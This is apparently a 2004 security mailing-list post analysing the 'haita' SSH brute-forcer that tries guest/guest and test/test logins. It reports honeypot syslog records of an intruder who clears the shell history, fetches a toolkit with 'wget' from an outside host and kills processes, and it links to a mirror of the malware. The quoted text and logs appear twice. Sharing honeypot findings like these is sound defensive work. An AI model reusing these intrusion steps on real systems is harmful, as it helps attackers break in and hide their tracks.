On Fri, Jul 30, 2004 at 07:22:45AM -0400, M Shirk wrote:
[..]
> There is also a multithreaded SSH bruteforcer called "haita"
> This attempts to login to machines using the accounts "test" and "guest",
> with passwords "test" & "guest" respectively. It runs from a file
> of addresses found by a synscan program. It identifies itself as
> SSH-2.0-libssh-0.1
>
> So, SSH login failures for test & guest are an indication of this
> thing running at the remote end.
>
> The two names & passwords appear to be hardcoded into the program.
> Since Linux as I recall backs off after failed attempts there wouldn't be
> much to gain by trying many more names, but variants may appear with other
> defaults.
I just setup an account "guest" with password "guest" and a shell modified
to log commands via syslog[0].
Sep 8 02:08:45 azathoth sshd[5890]: Accepted password for guest from 218.25.120.5 port 2952 ssh2
Sep 8 02:11:24 azathoth sshd[5914]: Accepted password for guest from 82.77.67.250 port 1173 ssh2
Sep 8 02:11:29 localhost T=2004-09-08__02:11:29 PI=5917 UI=1007 w
Sep 8 02:11:45 localhost T=2004-09-08__02:11:45 PI=5917 UI=1007 unset HISTFILE ; unset HISTSAVE
Sep 8 02:12:10 localhost T=2004-09-08__02:12:10 PI=5917 UI=1007 mkdir /tmp/PS
Sep 8 02:12:17 localhost T=2004-09-08__02:12:17 PI=5917 UI=1007 cd /tmp/PS
Sep 8 02:12:23 localhost T=2004-09-08__02:12:23 PI=5917 UI=1007 ls -a
Sep 8 02:12:42 localhost T=2004-09-08__02:12:42 PI=5917 UI=1007 wget memphis.freehttp.com/69
Sep 8 02:13:24 localhost T=2004-09-08__02:13:24 PI=5917 UI=1007 kill -9 0
(All timestamps are MEST).
Timestamps suggest all commands were typed in by hand; no
attempt was made to compromise the target system.
On Fri, Jul 30, 2004 at 07:22:45AM -0400, M Shirk wrote:
[..]
> There is also a multithreaded SSH bruteforcer called "haita"
> This attempts to login to machines using the accounts "test" and "guest",
> with passwords "test" & "guest" respectively. It runs from a file
> of addresses found by a synscan program. It identifies itself as
> SSH-2.0-libssh-0.1
>
> So, SSH login failures for test & guest are an indication of this
> thing running at the remote end.
>
> The two names & passwords appear to be hardcoded into the program.
> Since Linux as I recall backs off after failed attempts there wouldn't be
> much to gain by trying many more names, but variants may appear with other
> defaults.
I just setup an account "guest" with password "guest" and a shell modified
to log commands via syslog[0].
Sep 8 02:08:45 azathoth sshd[5890]: Accepted password for guest from 218.25.120.5 port 2952 ssh2
Sep 8 02:11:24 azathoth sshd[5914]: Accepted password for guest from 82.77.67.250 port 1173 ssh2
Sep 8 02:11:29 localhost T=2004-09-08__02:11:29 PI=5917 UI=1007 w
Sep 8 02:11:45 localhost T=2004-09-08__02:11:45 PI=5917 UI=1007 unset HISTFILE ; unset HISTSAVE
Sep 8 02:12:10 localhost T=2004-09-08__02:12:10 PI=5917 UI=1007 mkdir /tmp/PS
Sep 8 02:12:17 localhost T=2004-09-08__02:12:17 PI=5917 UI=1007 cd /tmp/PS
Sep 8 02:12:23 localhost T=2004-09-08__02:12:23 PI=5917 UI=1007 ls -a
Sep 8 02:12:42 localhost T=2004-09-08__02:12:42 PI=5917 UI=1007 wget memphis.freehttp.com/69
Sep 8 02:13:24 localhost T=2004-09-08__02:13:24 PI=5917 UI=1007 kill -9 0
(All timestamps are MEST).
Timestamps suggest all commands were typed in by hand; no
attempt was made to compromise the target system.
# file /tmp/PS/69
/tmp/PS/69: gzip compressed data, from Unix
# tar tzvf /tmp/PS/69
drwxr-xr-x root/root 0 2004-07-12 20:10 ssh/
-rwxr-xr-x root/root 453972 2004-07-12 20:09 ssh/ss
-rwxr-xr-x root/root 1365263 2004-07-12 20:10 ssh/sshf
-rwxr-xr-x root/root 85 2004-07-12 20:10 ssh/go.sh
'ss' is a simple port scanner used to find other systems
running a ssh server, running 'strings' on it suggests its
this one: [1]
'sshf' is then used to try logging onto the systems using
test/test and guest/guest (seems to be hardcoded).
I've mirrored '69' at [2], just in case someone wants to
take a closer look.
- Sebastian
[0] http://www.honeynet.org/tools/dcapture/bash-perassi.patch
[1] http://www.securiteam.com/tools/5EP0B0ADFO.html
[2] http://www.jaenicke.org/misc/69
--
Sebastian Jaenicke Disce aut discede!
whois pgpkey-C81115B1 -h whois.ripe.net|perl -ne's-^certif: *--&&print'
[ reply ]